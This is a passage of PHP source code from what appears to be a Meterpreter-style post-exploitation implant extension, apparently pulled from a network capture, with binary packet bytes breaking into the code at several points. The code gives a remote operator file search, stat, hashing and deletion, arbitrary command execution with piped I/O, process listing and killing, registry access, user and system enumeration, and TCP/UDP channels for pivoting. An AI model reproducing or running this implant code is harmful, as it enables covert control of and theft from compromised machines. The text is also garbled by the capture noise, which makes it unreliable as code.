register_command('stdapi_fs_stat'); function stdapi_fs_stat($req, &$pkt) { my_print("doing stat"); $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH); $path = cononicalize_path($path_tlv['value']); $st = stat($path); if ($st) { $st_buf = ""; $st_buf .= pack("V", $st['dev']); $st_buf .= pack("v", $st['ino']); $st_buf .= pack("v", $st['mode']); $st_buf .= pack("v", $st['nlink']); $st_buf .= pack("v", $st['uid']); $st_buf .= pack("v", $st['gid']); $st_buf .= pack("v", 0); $st_buf .= pack("V", $st['rdev']); $st_buf .= pack("V", $st['size']); $st_buf .= pack("V", $st['atime']); $st_buf .= pack("V", $st['mtime']); $st_buf .= pack("V", $st['ctime']); $st_buf .= pack("V", $st['blksize']); $st_buf .= pack("V", $st['blocks']); packet_add_tlv($pkt, create_tlv(TLV_TYPE_STAT_BUF, $st_buf)); return ERROR_SUCCESS; } else { return ERROR_FAILURE; } } } # works if (!function_exists('stdapi_fs_delete_file')) { register_command('stdapi_fs_delete_file'); function stdapi_fs_delete_file($req, &$pkt) { my_print("doing delete"); $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH); $path = cononicalize_path($path_tlv['value']); if ($path && is_file($path)) { $worked = @unlink($path); return ($worked ? ERROR_SUCCESS : ERROR_FAILURE); } else { return ERROR_FAILURE; } } } if (!function_exists('stdapi_fs_search')) { register_command('stdapi_fs_search'); function stdapi_fs_search($req, &$pkt) { my_print("doing search"); $root_tlv = packet_get_tlv($req, TLV_TYPE_SEARCH_ROOT); $root = cononicalize_path($root_tlv['value']); $glob_tlv = packet_get_tlv($req, TLV_TYPE_SEARCH_GLOB); $glob = cononicalize_path($glob_tlv['value']); $recurse_tlv = packet_get_tlv($req, TLV_TYPE_SEARCH_RECURSE); $recurse = $recurse_tlv['value']; if (!$root) { $root = '.'; } my_print("glob: $glob, root: $root, recurse: $recurse"); $flags = GLOB_PATH; if ($recurse) { $flags |= GLOB_RECURSE; } $files = safe_glob($root ."/". $glob, $flags); if ($files and is_array($files)) { dump_array($files); foreach ($files as $file) { $file_tlvs = ""; $s = stat($file); $p = dirname($file); $f = basename($file); $file_tlvs .= tlv_pack(create_tlv(TLV_TYPE_FILE_PATH, $p)); $file_tlvs .= tlv_pack(create_tlv(TLV_TYPE_FILE_NAME, $f)); $file_tlvs .= tlv_pack(create_tlv(TLV_TYPE_FILE_SIZE, $s['size'])); packet_add_tlv($pkt, create_tlv(TLV_TYPE_SEARCH_RESULTS, $file_tlvs)); } } return ERROR_SUCCESS; } } if (!function_exists('stdapi_fs_md5')) { register_command("stdapi_fs_md5"); function stdapi_fs_md5($req, &$pkt) { $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH); $path = cononicalize_path($path_tlv['value']); if (is_callable("md5_file")) { $md5 = md5_file($path); } else { $md5 = md5(file_get_contents($path)); } $md5 = pack("H*", $md5); # Ghetto abuse of file name type to indicate the md5 result packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5)); return ERROR_SUCCESS; } } if (!function_exists('stdapi_fs_sha1')) { register_command("stdapi_fs_sha1"); function stdapi_fs_sha1($req, &$pkt) { $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH); $path = cononicalize_path($path_tlv['value']); if (is_callable("sha1_file")) { $sha1 = sha1_file($path); } else { $sha1 = sha1(file_get_contents($path)); } $sha1 = pack("H*", $sha1); # Ghetto abuse of file name type to indicate the sha1 result packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1)); return ERROR_SUCCESS; } } # Sys Config # works if (!function_exists('stdapi_sys_config_getuid')) { register_command('stdapi_sys_config_getuid'); function stdapi_sys_config_getuid($req, &$pkt) { my_print("doing getuid"); if (is_callable('posix_getuid')) { $uid = posix_getuid(); $pwinfo = posix_getpwuid($uid); $user = $pwinfo['name'] . " ($uid)"; } else { # The posix functions aren't available, this is probably windows. Use # the functions for getting user name and uid based on file ownership # instead. $user = get_current_user() . " (" . getmyuid() . ")"; } packet_add_tlv($pkt, create_tlv(TLV_TYPE_USER_NAME, $user)); return ERROR_SUCCESS; } } # Unimplemented becuase it's unimplementable #if (!function_exists('stdapi_sys_config_rev2self')) { #register_command('stdapi_sys_config_rev2self'); #function stdapi_sys_config_rev2self($req, &$pkt) { # my_print("doing rev2self"); # return ERROR_FAILURE; #} #} # works if (!function_exists('stdapi_sys_config_sysinfo')) { register_command('stdapi_sys_config_sysinfo'); function stdapi_sys_config_sysinfo($req, &$pkt) { my_print("doing sysinfo"); packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n"))); packet_add_tlv($pkt, create_tlv(TLV_TYPE_OS_NAME, php_uname())); return ERROR_SUCCESS; } } # Global list of processes so we know what to kill when a channel gets closed $GLOBALS['processes'] = array(); if (!function_exists('stdapi_sys_process_execute')) { register_command('stdapi_sys_process_execute'); function stdapi_sys_process_execute($req, &$pkt) { global $channel_process_map, $processes; my_print("doing execute"); $cmd_tlv = packet_get_tlv($req, TLV_TYPE_PROCESS_PATH); $args_tlv = packet_get_tlv($req, TLV_TYPE_PROCESS_ARGUMENTS); $flags_tlv = packet_get_tlv($req, TLV_TYPE_PROCESS_FLAGS); $cmd = $cmd_tlv['value']; $args = $args_tlv['value']; $flags = $flags_tlv['value']; # If there was no command specified, well, a user sending an empty command # deserves failure. my_print("Cmd: $cmd $args"); if (0 > strlen($cmd)) { return ERROR_FAILURE; } $real_cmd = $cmd ." ". $args; $pipe_desc = array(array('pipe','r'), array('pipe','w')); if (is_windows()) { # see http://us2.php.net/manual/en/function.proc-open.php#97012 array_push($pipe_desc, array('pipe','a')); } else { array_push($pipe_desc, array('pipe','w')); } # Now that we've got the command built, run it. If it worked, we'll send # back a handle identifier. $handle = proc_open($real_cmd, $pipe_desc, $pipes); if (!is_resource($handle)) { return ERROR_FAILURE; } if (is_callable('proc_get_status')) { $status = proc_get_status($handle); $pid = $status['pid']; } else { $pid = 0; } $proc = array( 'handle' => $handle, 'pipes' => $pipes ); packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, $pid)); packet_add_tlv($pkt, create_tlv(TLV_TYPE_PROCESS_HANDLE, count($processes))); if ($flags & PROCESS_EXECUTE_FLAG_CHANNELIZED) { my_print("Channelized"); # Then the client wants a channel set up to handle this process' stdio, # register all the necessary junk to make that happen. foreach ($pipes as $p) { register_stream($p); } #stream_set_blocking($pipes[0], 1); #stream_set_blocking($pipes[1], 1); #stream_set_blocking($pipes[2], 1); $cid = register_channel($pipes[0], $pipes[1], $pipes[2]); $channel_process_map[$cid] = $proc; $proc['cid'] = $cid; packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $cid)); #} else { # Otherwise, don't care about stdin/stdout, just run the command } $processes[] = $proc; return ERROR_SUCCESS; } } if (!function_exists('stdapi_sys_process_close')) { register_command('stdapi_sys_process_close'); function stdapi_sys_process_close($req, &$pkt) { global $processes; my_print("doing process_close"); $handle_tlv = packet_get_tlv($req, TLV_TYPE_PROCESS_HANDLE); if (array_key_exists($handle_tlv['value'], $processes)) { close_process($processes[$handle_tlv['value']]); } return ERROR_SUCCESS; } } if (!function_exists('close_process')) { function close_process($proc) { if ($proc) { my_print("Closing process handle {$proc['handle']}"); # In the case of a channelized process, this will be redundant as the # channel_close will also try to close all of these handles. There's no # real harm in that, so go ahead and just always make sure they get # closed. foreach ($proc['pipes'] as $f) { @fclose($f); } if (is_`~QJBB )y*= ) dE47@@  \D true); } # proc_close blocks waiting for the child to exit, so if it's still # running, don't take a chance on deadlock and just sigkill it if we # can. We can't on php < 4.3, so don't do anything. This will leave # zombie processes, but that's better than deadlock. if ($status['running'] == false) { proc_close($proc['handle']); } else { if (is_callable('proc_terminate')) { proc_terminate($proc['handle'], 9); } } if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) { unset($channel_process_map[$proc['cid']]); } } } } # Works, but not very portable. There doesn't appear to be a PHP way of # getting a list of processes, so we just shell out to ps/tasklist.exe. I need # to decide what options to send to ps for portability and for information # usefulness. if (!function_exists('stdapi_sys_process_get_processes')) { register_command('stdapi_sys_process_get_processes'); function stdapi_sys_process_get_processes($req, &$pkt) { my_print("doing get_processes"); $list = array(); if (is_windows()) { # This command produces a line like: # "tasklist.exe","2264","Console","0","4,556 K","Running","EGYPT-B3E55BF3C\Administrator","0:00:00","OleMainThreadWndName" $output = my_cmd("tasklist /v /fo csv /nh"); $lines = explode("\n", trim($output)); foreach ($lines as $line) { $line = trim($line); # # Ghetto CSV parsing # $pieces = preg_split('/","/', $line); # Strip off the initial quote on the first and last elements $pieces[0] = substr($pieces[0], 1, strlen($pieces[0])); $cnt = count($pieces) - 1; $pieces[$cnt] = substr($pieces[$cnt], 1, strlen($pieces[$cnt])); $proc_info = array($pieces[1], $pieces[6], $pieces[0]); array_push($list, $proc_info); } } else { # This command produces a line like: # 1553 root /sbin/getty -8 38400 tty1 $output = my_cmd("ps ax -w -o pid,user,cmd --no-header 2>/dev/null"); $lines = explode("\n", trim($output)); foreach ($lines as $line) { array_push($list, preg_split("/\s+/", trim($line))); } } foreach ($list as $proc) { $grp = ""; $grp .= tlv_pack(create_tlv(TLV_TYPE_PID, $proc[0])); $grp .= tlv_pack(create_tlv(TLV_TYPE_USER_NAME, $proc[1])); $grp .= tlv_pack(create_tlv(TLV_TYPE_PROCESS_NAME, $proc[2])); # Strip the pid and the user name off the front; the rest will be the # full command line array_shift($proc); array_shift($proc); $grp .= tlv_pack(create_tlv(TLV_TYPE_PROCESS_PATH, join($proc, " "))); packet_add_tlv($pkt, create_tlv(TLV_TYPE_PROCESS_GROUP, $grp)); } return ERROR_SUCCESS; } } # works if (!function_exists('stdapi_sys_process_getpid')) { register_command('stdapi_sys_process_getpid'); function stdapi_sys_process_getpid($req, &$pkt) { my_print("doing getpid"); packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid())); return ERROR_SUCCESS; } } if (!function_exists('stdapi_sys_process_kill')) { register_command('stdapi_sys_process_kill'); function stdapi_sys_process_kill($req, &$pkt) { # The existence of posix_kill is unlikely (it's a php compile-time option # that isn't enabled by default, but better to try it and avoid shelling # out when unnecessary. my_print("doing kill"); $pid_tlv = packet_get_tlv($req, TLV_TYPE_PID); $pid = $pid_tlv['value']; if (is_callable('posix_kill')) { $ret = posix_kill($pid, 9); $ret = $ret ? ERROR_SUCCESS : posix_get_last_error(); if ($ret != ERROR_SUCCESS) { my_print(posix_strerror($ret)); } } else { $ret = ERROR_FAILURE; if (is_windows()) { my_cmd("taskkill /f /pid $pid"); # Don't know how to check for success yet, so just assume it worked $ret = ERROR_SUCCESS; } else { if ("foo" == my_cmd("kill -9 $pid && echo foo")) { $ret = ERROR_SUCCESS; } } } return $ret; } } if (!function_exists('stdapi_net_socket_tcp_shutdown')) { register_command('stdapi_net_socket_tcp_shutdown'); function stdapi_net_socket_tcp_shutdown($req, &$pkt) { my_print("doing stdapi_net_socket_tcp_shutdown"); $cid_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID); $c = get_channel_by_id($cid_tlv['value']); if ($c && $c['type'] == 'socket') { @socket_shutdown($c[0], $how); $ret = ERROR_SUCCESS; } else { $ret = ERROR_FAILURE; } return $ret; } } # # Registry # if (!function_exists('register_registry_key')) { $_GLOBALS['registry_handles'] = array(); function register_registry_key($key) { global $registry_handles; $registry_handles[] = $key; return count($registry_handles) - 1; } } if (!function_exists('deregister_registry_key')) { function deregister_registry_key($id) { global $registry_handles; $registry_handles[$id] = null; } } if (!function_exists('stdapi_registry_create_key')) { if (is_windows() and is_callable('reg_open_key')) { register_command('stdapi_registry_create_key'); } function stdapi_registry_create_key($req, &$pkt) { my_print("doing stdapi_registry_create_key"); if (is_windows() and is_callable('reg_open_key')) { $root_tlv = packet_get_tlv($req, TLV_TYPE_ROOT_KEY); $base_tlv = packet_get_tlv($req, TLV_TYPE_BASE_KEY); $perm_tlv = packet_get_tlv($req, TLV_TYPE_PERMISSION); dump_array($root_tlv); dump_array($base_tlv); # For some reason the php constants for registry root keys do not have # the high bit set and are 1 less than the normal Windows constants, so # fix it here. $root = ($root_tlv['value'] & ~0x80000000) + 1; $base = $base_tlv['value']; my_print("reg opening '$root', '$base'"); $key = reg_open_key($root, $base); if (!$key) { my_print("reg open failed: $key"); return ERROR_FAILURE; } $key_id = register_registry_key($key); packet_add_tlv($pkt, create_tlv(TLV_TYPE_HKEY, $key_id)); return ERROR_SUCCESS; } else { return ERROR_FAILURE; } } } if (!function_exists('stdapi_registry_close_key')) { if (is_windows() and is_callable('reg_open_key')) { register_command('stdapi_registry_close_key'); } function stdapi_registry_close_key($req, &$pkt) { if (is_windows() and is_callable('reg_open_key')) { global $registry_handles; my_print("doing stdapi_registry_close_key"); $key_id_tlv = packet_get_tlv($req, TLV_TYPE_ROOT_KEY); $key_id = $key_id_tlv['value']; reg_close_key($registry_handles[$key_id]); deregister_registry_key($key_id); return ERROR_SUCCESS; } else { return ERROR_FAILURE; } } } if (!function_exists('stdapi_registry_que`~QK ) d )y*=E@@.  \P D<ŀ 3 ry_value')) { if (is_windows() and is_callable('reg_open_key')) { register_command('stdapi_registry_query_value'); } function stdapi_registry_query_value($req, &$pkt) { if (is_windows() and is_callable('reg_open_key')) { global $registry_handles; my_print("doing stdapi_registry_query_value"); $key_id_tlv = packet_get_tlv($req, TLV_TYPE_HKEY); $key_id = $key_id_tlv['value']; $name_tlv = packet_get_tlv($req, TLV_TYPE_VALUE_NAME); $name = $name_tlv['value']; #my_print("Looking up stored key handle $key_id"); #dump_array($registry_handles, "Reg handles"); $key = $registry_handles[$key_id]; if (!$key) { return ERROR_FAILURE; } $data = reg_get_value($key, $name); my_print("Found data for $key\\$name : $data, ". is_int($data)); # There doesn't appear to be an API to get the typ`~QKBB )y*= ) dE47@@  \D 'rb'); } $fd = @fopen($fpath_tlv['value'], $mode_tlv['value']); if (is_resource($fd)) { register_stream($fd); $id = register_channel($fd); packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $id)); return ERROR_SUCCESS; } else { my_print("Failed to open"); } return ERROR_FAILURE; } } if (!function_exists('channel_create_stdapi_net_tcp_client')) { function channel_create_stdapi_net_tcp_client($req, &$pkt) { my_print("creating tcp client"); $peer_host_tlv = packet_get_tlv($req, TLV_TYPE_PEER_HOST); $peer_port_tlv = packet_get_tlv($req, TLV_TYPE_PEER_PORT); $local_host_tlv = packet_get_tlv($req, TLV_TYPE_LOCAL_HOST); $local_port_tlv = packet_get_tlv($req, TLV_TYPE_LOCAL_PORT); $retries_tlv = packet_get_tlv($req, TLV_TYPE_CONNECT_RETRIES); if ($retries_tlv['value']) { $retries = $retries_tlv['value']; } else { $retries = 1; } for ($i = 0; $i < $retries; $i++) { $sock = connect($peer_host_tlv['value'], $peer_port_tlv['value']); if ($sock) { break; } } if (!$sock) { return ERROR_CONNECTION_ERROR; } # # If we got here, the connection worked, respond with the new channel ID # $id = register_channel($sock); packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $id)); add_reader($sock); return ERROR_SUCCESS; } } if (!f`~Q\qq ) d )y*=Ec@@  \PD<ŀ+ 3 unction_exists('channel_create_stdapi_net_udp_client')) { function channel_create_stdapi_net_udp_client($req, &$pkt) { my_print("creating udp client"); $peer_host_tlv = packet_get_tlv($req, TLV_TYPE_PEER_HOST); $peer_port_tlv = packet_get_tlv($req, TLV_TYPE_PEER_PORT); # We can't actually do anything with local_host and local_port because PHP # doesn't let us specify these values in any of the exposed socket API # functions. #$local_host_tlv = packet_get_tlv($req, TLV_TYPE_LOCAL_HOST); #$local_port_tlv = packet_get_tlv($req, TLV_TYPE_LOCAL_PORT); $sock = connect($peer_host_tlv['value'], $peer_port_tlv['value'], 'udp'); my_print("UDP channel on {$sock}"); if (!$sock) { return ERROR_CONNECTION_ERROR; } # # If we got here, the connection worked, respond with the new channel ID # $id = register_channel($sock); packet_add_tlv($pkt, create_tlv(TLV_TYPE_CHANNEL_ID, $id)); add_reader($sock); return ERROR_SUCCESS; } } ext82341.php ext82341.php`~Q\BB )y*= ) dE47@@  \DrA!!z~Qy~Qy~Q `~QnBB ) d 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